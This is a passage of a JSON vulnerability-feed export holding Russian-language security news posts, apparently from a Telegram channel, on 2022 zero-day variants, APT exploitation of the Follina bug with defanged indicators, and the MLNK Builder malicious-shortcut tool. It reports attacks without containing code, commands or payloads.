\n\n\u0421\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u043e \u043e \u0447\u0435\u043c \u0440\u0435\u0447\u044c, \u0430 \u0432\u043e\u0442 \u043e \u0447\u0435\u043c: \u043f\u043e \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0430\u043c \u0430\u043d\u0430\u043b\u0438\u0437\u0430 Google Project Zero \u0437\u0430 \u043f\u0435\u0440\u0432\u0443\u044e \u043f\u043e\u043b\u043e\u0432\u0438\u043d\u0443 2022 \u0433\u043e\u0434\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043e \u0432 \u043e\u0431\u0449\u0435\u0439 \u0441\u043b\u043e\u0436\u043d\u043e\u0441\u0442\u0438 18 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f, \u043f\u043e\u043b\u043e\u0432\u0438\u043d\u0430 \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u0435\u0442 \u0438\u0437-\u0437\u0430 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438 \u043d\u0435 \u0431\u044b\u043b\u0438 \u0434\u043e\u043b\u0436\u043d\u044b\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u044b.\n\n\u041f\u043e \u0441\u043b\u043e\u0432\u0430\u043c \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u0430 \u041c\u044d\u0434\u0434\u0438 \u0421\u0442\u043e\u0443\u043d\u0430 9 \u0438\u0437 \u0440\u0435\u0430\u043b\u044c\u043d\u044b\u0445 0-day, \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0432\u0448\u0438\u0445\u0441\u044f \u0434\u043e \u0441\u0438\u0445 \u043f\u043e\u0440 \u0432 \u044d\u0442\u043e\u043c \u0433\u043e\u0434\u0443, \u043c\u043e\u0436\u043d\u043e \u0431\u044b\u043b\u043e \u0431\u044b \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0442\u0438\u0442\u044c, \u0435\u0441\u043b\u0438 \u0431\u044b 
\u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u043b\u0438 \u0431\u043e\u043b\u0435\u0435 \u043a\u043e\u043c\u043f\u043b\u0435\u043a\u0441\u043d\u044b\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f, \u0430 4 \u043e\u0448\u0438\u0431\u043a\u0438 2022 \u0433\u043e\u0434\u0430 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0430\u043c\u0438 \u043d\u0443\u043b\u0435\u0432\u044b\u0445 \u0434\u043d\u0435\u0439 2021 \u0433\u043e\u0434\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435.\n\n\u0421\u0430\u043c\u0430\u044f \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u044f\u044f \u0438\u0437 \u044d\u0442\u0438\u0445 \u043f\u0440\u043e\u0431\u043b\u0435\u043c \u2014 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Follina \u0432 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c\u0435 Windows, \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u0430\u044f \u043a\u0430\u043a CVE-2022-30190, \u043f\u043e \u0441\u0443\u0442\u0438 \u0432\u0430\u0440\u0438\u0430\u043d\u0442 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f MSHTML, \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u043c\u044b\u0439 \u043a\u0430\u043a CVE-2021-40444.\n\nCVE-2022-21882 \u2014 \u044d\u0442\u043e \u0435\u0449\u0435 \u043e\u0434\u043d\u0430 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Windows, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0449\u0430\u044f \u0441\u043e\u0431\u043e\u0439 \u0440\u0430\u0437\u043d\u043e\u0432\u0438\u0434\u043d\u043e\u0441\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0431\u044b\u043b\u0430 \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e 
\u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0430 \u0432 \u043f\u0440\u043e\u0448\u043b\u043e\u043c \u0433\u043e\u0434\u0443, \u0430 \u0438\u043c\u0435\u043d\u043d\u043e CVE-2021-1732 .\n\n\u041e\u0448\u0438\u0431\u043a\u0430 iOS IOMobileFrameBuffer (CVE-2022-22587) \u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0430\u044f \u0441 \u043f\u0443\u0442\u0430\u043d\u0438\u0446\u0435\u0439 \u0442\u0438\u043f\u043e\u0432 \u0432 \u0434\u0432\u0438\u0436\u043a\u0435 Chrome V8 (CVE-2022-1096) \u2014 \u044d\u0442\u043e \u0434\u0432\u0435 \u0434\u0440\u0443\u0433\u0438\u0435 \u043e\u0448\u0438\u0431\u043a\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0430\u043c\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 \u0432 \u043f\u0440\u043e\u0448\u043b\u043e\u043c \u0433\u043e\u0434\u0443 \u2014 CVE-2021-30983 \u0438 CVE-2021-30551 \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e.\n\n\u0414\u0440\u0443\u0433\u0438\u043c\u0438 0-day 2022 \u0433\u043e\u0434\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0430\u043c\u0438 \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u043d\u044b\u0445 \u0434\u0435\u0444\u0435\u043a\u0442\u043e\u0432 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f CVE-2022-1364 (Chrome), CVE-2022-22620 (WebKit), CVE-2021-39793 (Google Pixel), CVE-2022-26134 (Atlassian 
Confluence) \u0438 CVE-2022-26925 (\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Windows \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043a\u0430\u043a PetitPotam).\n\n\u0412 \u043e\u0431\u0449\u0435\u043c \u0438\u0441\u043f\u0440\u0430\u0432\u0438\u043b\u0438 \u0442\u0430\u043a, \u0447\u0442\u043e \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0441\u043c\u043e\u0433\u043b\u0438 \u0432\u0435\u0440\u043d\u0443\u0442\u044c\u0441\u044f \u0438 \u0430\u043a\u0442\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u0440\u0443\u0433\u0438\u043c \u043f\u0443\u0442\u0435\u043c \u043b\u0438\u0431\u043e \u0441\u043d\u043e\u0432\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0442\u0435 \u0436\u0435 \u043e\u0448\u0438\u0431\u043a\u0438.\n\n\u042d\u0442\u043e \u0432\u0441\u0435\u0433\u0434\u0430 \u0433\u0440\u043e\u043c\u043a\u043e \u0438 \u0431\u043e\u043b\u044c\u043d\u043e, \u043d\u043e \u043e\u0442\u0447\u0430\u0441\u0442\u0438 \u0445\u043e\u0440\u043e\u0448\u043e \u043a\u043e\u0433\u0434\u0430 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u044b 0-day \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u0432\u0430\u044e\u0442\u0441\u044f \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435, \u0442\u0430\u043a \u043a\u0430\u043a \u044d\u0442\u043e \u043d\u0435\u0443\u0434\u0430\u0447\u0430 \u0434\u043b\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432, \u0430 \u0434\u043b\u044f \u0438\u043d\u0444\u043e\u0441\u0435\u043a \u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0430 \u044d\u0442\u043e \u043f\u043e\u0434\u0430\u0440\u043e\u043a, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 
\u0443\u0437\u043d\u0430\u0442\u044c \u043a\u0430\u043a \u043c\u043e\u0436\u043d\u043e \u0431\u043e\u043b\u044c\u0448\u0435 \u0438 \u043f\u0440\u0438\u043d\u044f\u0442\u044c \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u043c\u0435\u0440\u044b, \u0447\u0442\u043e\u0431\u044b \u0433\u0430\u0440\u0430\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c, \u0447\u0442\u043e \u044d\u0442\u043e\u0442 \u0432\u0435\u043a\u0442\u043e\u0440 \u043d\u0435\u043b\u044c\u0437\u044f \u0431\u0443\u0434\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0432 \u0431\u0443\u0434\u0443\u0449\u0435\u043c.\n\n\u0427\u0442\u043e\u0431\u044b \u0434\u043e\u043b\u0436\u043d\u044b\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u0442\u044c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Google \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u044e\u0442 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u0430\u043c \u043f\u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430\u043c \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c \u0438 \u0434\u0440\u0443\u0433\u0438\u043c \u043d\u0435\u0437\u0430\u0432\u0438\u0441\u0438\u043c\u044b\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0432 \u043e\u0431\u043b\u0430\u0441\u0442\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438\u043d\u0432\u0435\u0441\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432 \u0430\u043d\u0430\u043b\u0438\u0437 \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u0445 \u043f\u0440\u0438\u0447\u0438\u043d \u0438 
\u0432\u0430\u0440\u0438\u0430\u043d\u0442\u043e\u0432 \u0432\u043e\u0437\u043d\u0438\u043a\u043d\u043e\u0432\u0435\u043d\u0438\u044f \u043e\u0448\u0438\u0431\u043e\u043a, \u0430\u043d\u0430\u043b\u0438\u0437 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0439 \u0438 \u0430\u043d\u0430\u043b\u0438\u0437 \u043c\u0435\u0442\u043e\u0434\u043e\u0432 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f.", "creation_timestamp": "2022-07-04T20:00:05.000000Z"}, {"uuid": "28307472-e814-44cf-98db-8616d356d46f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/true_secator/3032", "content": "\u034fFollinaGate \u043d\u0430\u0431\u0438\u0440\u0430\u0435\u0442 \u043e\u0431\u043e\u0440\u043e\u0442\u044b. \u041a\u0430\u043a \u043c\u044b \u0438 \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u0430\u0433\u0430\u043b\u0438, \u043e\u0448\u0438\u0431\u043a\u043e\u0439 Microsoft \u0443\u0436\u0435 \u0432\u043e\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438\u0441\u044c \u0410\u0420\u0422 \u0434\u043b\u044f \u043d\u0430\u043f\u0430\u0434\u0435\u043d\u0438\u044f \u043d\u0430 \u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0435 \u0443\u0447\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f \u0432 \u0415\u0432\u0440\u043e\u043f\u0435 \u0438 \u0421\u0428\u0410.\n\n\u041a\u0430\u043a \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e 0-day Follina, \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442 \u0441\u0445\u0435\u043c\u0443 URI \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 ms-msdt \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0446\u0435\u043b\u0435\u0432\u044b\u043c\u0438 
\u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u0430\u043c\u0438. \u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a \u0441 \u0441\u0430\u043c\u043e\u0433\u043e \u043d\u0430\u0447\u0430\u043b\u0430 \u043f\u044b\u0442\u0430\u043b\u0441\u044f \u0437\u0430\u043c\u044f\u0442\u044c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443, \u043e\u0434\u043d\u0430\u043a\u043e \u043f\u043e\u0441\u043b\u0435 \u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0433\u043e \u0440\u0435\u0437\u043e\u043d\u0430\u043d\u0441\u0430 Microsoft \u043f\u0440\u0438\u0448\u043b\u043e\u0441\u044c \u043f\u043e\u0434\u0441\u0443\u0435\u0442\u0438\u0442\u044c\u0441\u044f, \u043f\u0440\u0430\u0432\u0434\u0430 \u043f\u043e\u043a\u0430 \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0430 \u0431\u0443\u043c\u0430\u0433\u0435, \u043a\u0430\u043a \u0433\u043e\u0432\u043e\u0440\u0438\u0442\u044c\u0441\u044f. \n\n\u042d\u043a\u0441\u0442\u0440\u0435\u043d\u043d\u043e \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u044f\u0442\u044c \u043f\u0440\u0438\u0448\u043b\u043e\u0441\u044c \u0447\u0430\u0441\u0442\u043d\u044b\u043c \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u0430\u043c: 0patch \u0432\u044b\u043f\u0443\u0441\u0442\u0438\u043b\u0430\u00a0\u043d\u0435\u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0435 \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u0435\u00a0\u0434\u043b\u044f \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0449\u0438\u0445\u0441\u044f \u0430\u0442\u0430\u043a \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Windows, \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u043d\u044b\u0445 \u043d\u0430 \u0431\u0430\u0433\u0438 Microsoft Windows Support Diagnostic Tool (MSDT).\n\n\u041e \u043d\u043e\u0432\u043e\u0439 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u0441 
\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 RCE CVE-2022-30190\u00a0(c \u043e\u0446\u0435\u043d\u043a\u043e\u0439 \u043f\u043e CVSS: 7,8) \u0441\u043e\u043e\u0431\u0449\u0438\u043b\u0438 \u0440\u0435\u0441\u0435\u0440\u0447\u0435\u0440\u044b Proofpoint, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0432 \u0445\u043e\u0434\u0435 \u043c\u043e\u043d\u0438\u0442\u043e\u0440\u0438\u043d\u0433\u0430 \u0438 \u0437\u0430\u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u0431\u043e\u043b\u0435\u0435 1000 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u0445 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0439 \u0441 \u0432\u043b\u043e\u0436\u0435\u043d\u0438\u0435\u043c \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e RTF-\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430 \u0441 \u0442\u0435\u043c\u0430\u0442\u0438\u043a\u043e\u0439 \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u044f \u0437\u0430\u0440\u043f\u043b\u0430\u0442\u044b. 
\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043f\u043e\u0434\u0433\u0440\u0443\u0436\u0430\u043b\u0441\u044f \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0441 45.76.53[.]253.\n\n\n\u041f\u043e\u043b\u0435\u0437\u043d\u0430\u044f \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0440\u0435\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u0430 \u0432 \u0444\u043e\u0440\u043c\u0435 \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f PowerShell \u0441 \u043a\u043e\u0434\u0438\u0440\u043e\u0432\u043a\u043e\u0439 Base64 \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442 \u0444\u0443\u043d\u043a\u0446\u0438\u044e \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a\u0430 \u0432\u0442\u043e\u0440\u043e\u0433\u043e \u0441\u0446\u0435\u043d\u0430\u0440\u0438\u044f PowerShell \u0441 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0441\u0435\u0440\u0432\u0435\u0440\u0430 seller-notification[.]live.\n\n\u0421\u043a\u0440\u0438\u043f\u0442 \u043f\u0440\u0438 \u044d\u0442\u043e\u043c \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438, \u043a\u0440\u0430\u0434\u0435\u0442 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0438\u0437 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u0431\u0440\u0430\u0443\u0437\u0435\u0440\u043e\u0432, \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0445 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0438 \u0444\u0430\u0439\u043b\u043e\u0432\u044b\u0445 \u0441\u043b\u0443\u0436\u0431, \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0443 \u043c\u0430\u0448\u0438\u043d\u044b, \u0430 \u0437\u0430\u0442\u0435\u043c \u0430\u0440\u0445\u0438\u0432\u0438\u0440\u0443\u0435\u0442 \u0434\u043b\u044f 
\u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u043f\u043e \u0430\u0434\u0440\u0435\u0441\u0443 45.77.156[.]179.\n\n\u041f\u043e\u0441\u043b\u0435 \u0432\u043d\u0438\u043c\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u044f \u043f\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0448\u0438\u0440\u043e\u043a\u0438\u0445 \u0440\u0430\u0437\u0432\u0435\u0434\u044b\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0435\u0439 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 PowerShell \u0432\u0442\u043e\u0440\u043e\u0433\u043e \u0443\u0440\u043e\u0432\u043d\u044f \u0438 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u0441\u043f\u0435\u0446\u0438\u0444\u0438\u043a\u0438 \u0442\u0430\u0440\u0433\u0435\u0442\u0438\u043d\u0433\u0430, Proofpoint \u043f\u0440\u0438\u0448\u043b\u0438 \u043a \u043e\u0436\u0438\u0434\u0430\u0435\u043c\u043e\u043c\u0443 \u0432\u044b\u0432\u043e\u0434\u0443 \u043e \u043f\u0440\u0438\u0447\u0430\u0441\u0442\u043d\u043e\u0441\u0442\u0438 \u043a \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u043f\u0440\u043e\u0433\u043e\u0441\u0443\u0434\u0430\u0440\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0439 \u0410\u0420\u0422.\n\n\u041d\u0435 \u043d\u0430\u0437\u044b\u0432\u0430\u044f \u0438\u043c\u0435\u043d, \u043d\u043e \u0436\u0438\u0440\u043d\u043e \u043d\u0430\u043c\u0435\u043a\u0430\u044f \u043d\u0430 \u043f\u043e\u043d\u044f\u0442\u043d\u044b\u0445 \u0438\u0441\u043f\u043e\u043b\u043d\u0438\u0442\u0435\u043b\u0435\u0439, \u0441\u0442\u0430\u0442\u044c\u0438 \u043e \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0441\u043f\u0435\u0448\u043d\u043e \u043f\u0435\u0447\u0430\u0442\u0430\u044e\u0442 \u0437\u0430\u043f\u0430\u0434\u043d\u044b\u0435 \u0438\u0437\u0434\u0430\u043d\u0438\u044f. 
\u0425\u043e\u0442\u044f \u043d\u0430\u043c \u043d\u0435 \u0434\u043e \u043a\u043e\u043d\u0446\u0430 \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u043f\u0440\u0438 \u0442\u0430\u043a\u043e\u0439 \u0430\u0442\u0440\u0438\u0431\u0443\u0446\u0438\u0438.", "creation_timestamp": "2022-06-06T20:57:39.000000Z"}, {"uuid": "43f097e5-0b75-4ec7-b3a5-2c009ed6c2b7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/true_secator/3195", "content": "\u034f\u041e\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0449\u0430\u044f \u0443\u0441\u043b\u0443\u0433\u0438 \u0418\u0411 \u0434\u043b\u044f \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 \u0438\u0437 Fortune 500, \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Resecurity Inc.\u00a0\u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430\u00a0\u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 MLNK Builder - \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u0441\u0430\u043c\u044b\u0445 \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u044b\u0445 \u0445\u0430\u043a\u0435\u0440\u0430\u043c\u0438 \u0434\u043b\u044f \u0433\u0435\u043d\u0435\u0440\u0430\u0446\u0438\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u044f\u0440\u043b\u044b\u043a\u043e\u0432 (LNK) \u0441 \u0443\u043b\u0443\u0447\u0448\u0435\u043d\u043d\u044b\u043c Powershell \u0438 VBS Obfuscator.\n\nMLNK Builder \u0442\u0435\u043f\u0435\u0440\u044c \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d \u0432\u00a0Dark Web\u00a0\u0432 \u043d\u043e\u0432\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438 4.2 \u0438 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u043c \u043d\u0430\u0431\u043e\u0440\u043e\u043c 
\u0444\u0443\u043d\u043a\u0446\u0438\u0439, \u043e\u0440\u0438\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c \u043d\u0430 \u0441\u043e\u043a\u0440\u044b\u0442\u0438\u0435 \u043e\u0442 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u044b\u0445 \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u0438 \u043c\u0430\u0441\u043a\u0438\u0440\u043e\u0432\u043a\u0443 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u044f\u0440\u043b\u044b\u043a\u043e\u0432 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0445 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0439 \u0438 \u0444\u0430\u0439\u043b\u043e\u0432.\n\n\u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 \u044f\u0440\u043b\u044b\u043a\u0438 \u0432 \u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u0432\u0441\u0435 \u0447\u0430\u0449\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0434\u043b\u044f \u0434\u043e\u0441\u0442\u0430\u0432\u043a\u0438 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0439 \u043f\u043e\u043b\u0435\u0437\u043d\u043e\u0439 \u043d\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0438 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u0443\u044e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443 \u0441 \u0442\u043e\u0447\u043a\u0438 \u0437\u0440\u0435\u043d\u0438\u044f ransomware \u0438\u043b\u0438 \u0431\u044b\u0441\u0442\u0440\u043e\u0440\u0430\u0441\u0442\u0443\u0449\u0438\u0445 \u0431\u043e\u0442\u043d\u0435\u0442\u043e\u0432.\n\n\u0412\u0441\u043f\u043b\u0435\u0441\u043a \u043a\u0440\u0443\u043f\u043d\u044b\u0445 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0439 \u0441 